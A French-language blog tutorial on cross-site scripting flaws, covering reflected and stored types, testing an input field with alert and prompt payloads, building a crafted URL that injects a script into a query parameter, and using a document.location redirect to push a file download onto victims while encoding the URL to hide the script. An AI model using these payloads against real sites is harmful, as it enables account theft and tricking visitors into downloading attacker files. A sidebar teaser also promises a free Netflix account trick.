Faille XSS, Cross Site Scripting, découvez quels sont les avantages de ces failles, découvrez le danger qu'elles représentent ! Lisez notre article !

La Faille XSS, Cross Site Scripting, découvrez quels sont les avantages de ces failles, découvrez le danger qu’elles représentent et les types d’attaques qui sont possible, de la simple redirection d’utilisateur à l’injection de fichier en ligne !

Qu’est-ce que la Faille XSS ?

La Faille XSS ou Cross Site Scripting est l’une des failles les plus courantes sur les sites Web.

Cette faille peut être évitée, mais parfois les développeurs web n’y prêtent pas assez attention et ne nettoie pas ou ne vérifient pas leurs codes, cette faille existe dans les formulaires Web, les sections de commentaires ou partout où la saisie de texte est nécessaire / requise.

Par exemple certains thèmes gratuits de WordPress ou Prestashop sont extrêmement touchés par certaines failles XSS, les développeurs tellement pressés de vendre leur thème fait à la va vite, ne se pré-occupent pas de se phénomène qui est une grande menace pour les clients qui achètent leurs thèmes.

Cet article s’ajoute en complément à notre précédent article : Comment pirater un site internet ?


Quel sont les impacts de la Faille XSS ?

Elle permets à l’attaquant d’injecter des scripts qui peuvent compromettre le site internet et mener à la divulgation d’informations confidentielles ou au vol de cookies qui peuvent finir par provoquer une usurpation de compte.

QUELQUES TERMES IMPORTANTS AVANT D’ALLER DE L’AVANT :

HTTP REQUEST : Assez simple à comprendre.

A chaque fois que vous lancez une page Web ou obtenez un fichier, votre navigateur fait une requête http dirigée vers le serveur du site internet.

Cette requête http est gérée par le serveur web et répond en conséquence.

PARAMETRES DE DEMANDE : Un peu plus complexe

C’est là que le script est injecté dans la plupart des sites faillibles  aux failles xss courantes.

Exemple = http://example.com/test.php?a=1&b=2 Dans cet exemple « a » et « b » sont des paramètres avec les valeurs respectives « 1 » et « 2 ».

Le script est le plus souvent injecté dans la valeur du paramètre.


Les Types de Failles XSS

Faille REFLECTED OR NON-PERSISTANT XSS : Ce type de faille xss est assez courant.

Ce n’est pas très dangereux en soi, mais lorsqu’il est combiné à l’ingénierie sociale, il peut être mortel. Dans ce type de faille xss, la charge utile ou le script fait partie de la requête http ou de l’URL.

Rien n’est stocké en permanence sur le serveur web dans ce type de xss, il peut être utilisé pour cibler spécifiquement une personne, il se compose d’un lien de site internet de confiance mais le lien se compose de vecteur/script xss.

Faille XSS : Ce type de xss est le plus dangereux.

Dans ce type de faille xss, l’attaquant injecte un script qui reste stocké de façon permanente sur la page Web de sorte que lorsque quelqu’un visite cette page, le script malveillant est exécuté.

Cela peut faire beaucoup de dégâts.

Cette faille XSS peut aussi être utilisé pour défigurer le site web (nous en reparlerons plus tard).


Comment trouver les Failles XSS sur un site web ?

Nous avons donc maintenant une connaissance de base de XSS et nous allons aller un peu plus loin et apprendre comment identifier une faille XSS dans un site Web.

 

Faille XSS - Qu'est-ce que c'est et comment l'utiliser ? Notre tutoriel !

Comme vous pouvez le voir sur la photo, le site contient une zone de saisie.

Donc, pour identifier la faille cela permet d’entrer un script simple dans la zone de saisie

<script>alert(« XSS found »)</script>

Ce script renvoie la réponse suivante et confirme qu’il y a une faille xss sur le site.

Faille XSS - Qu'est-ce que c'est et comment l'utiliser ? Notre tutoriel !

Pour être sûr que nous essayons d’injecter un script de plus dans le champ de recherche et que nous puissions voir le résultat.

<script>prompt(« XSS found »)</script>

Faille XSS - Qu'est-ce que c'est et comment l'utiliser ? Notre tutoriel !

Ceci confirme la faille XSS.

C’est un type de xss réfléchi et maintenant la question est de savoir comment exécuter le script à partir de l’URL.

Nous allons maintenant analyser les requêtes HTTP faites par le navigateur lorsque nous injectons le script. Voici les paramètres de la recherche.

XSS faille

Il y a un total de 4 paramètres.

Nous voyons que le script est injecté dans le paramètre « roll_number », donc si nous voulons que le script soit exécuté à partir d’une URL, nous allons devoir construire une URL comme celle-ci

Ainsi, en exécutant l’URL ci-dessus, notre script est également exécuté comme on peut le voir dans l’image. Nous pouvons exécuter n’importe quel script de cette façon.

http://www.example.com/find_result.php?submit=Result&m=98&roll_number= »><script>alert(« XSS+found+again »)</script>&s=147


Comment utiliser une Faille XSS pour faire télécharger un fichier à un visiteur ?

Ce sera facile une fois que vous aurez compris tout ce qui précède.

Dans l’URL que nous avons construit ci-dessus, si nous remplaçons ce script par le téléchargement de votre fichier commencera.

<script>document.location= »Lien de votre fichier »</script>

Faille XSS - Qu'est-ce que c'est et comment l'utiliser ? Notre tutoriel !

L’avantage est que la victime pense que le fichier provient d’un site Web de confiance.

Vous pouvez encoder l’url pour cacher votre script dans l’url.

Ce tutoriel est destiné à un but éducatif afin de pré-munir contre se phénomène qui touche de plus en plus les webmasters peu soucieux de leur sécurité.

Comment faire pour avoir Netflix gratuitement ?

Obtenez dès maintenant et en quelques secondes un compte Netflix gratuit ! Notre astuce vous permettra d'avoir Netflix sans payer et sans prise de tête ! Pas d'essai ni de streaming, que ce soi sur votre TV, votre ordinateur, votre

Comment tester et diagnostiquer son processeur ?

Vous avez des crash, des freezes ou des bugs ? Dans notre tutoriel nous allons vous apprendre à tester et diagnostiquer votre processeur CPU afin d'y trouver des erreurs. La résolution de ces problèmes peut résoudre les soucis de crash,

Comment booster sa connexion internet très facilement ?

Accélérer et Booster votre Connexion Internet peut-être nécessaire si vous avez des problèmes de connexion, wifi ou ethernet cette méthode fonctionne parfaitement, améliorez vos performances dans vos parties de jeux vidéos, obtenez un meilleur débit pour le visionnage de vos

Laisser un commentaire

Votre adresse de messagerie ne sera pas publiée. Les champs obligatoires sont indiqués avec *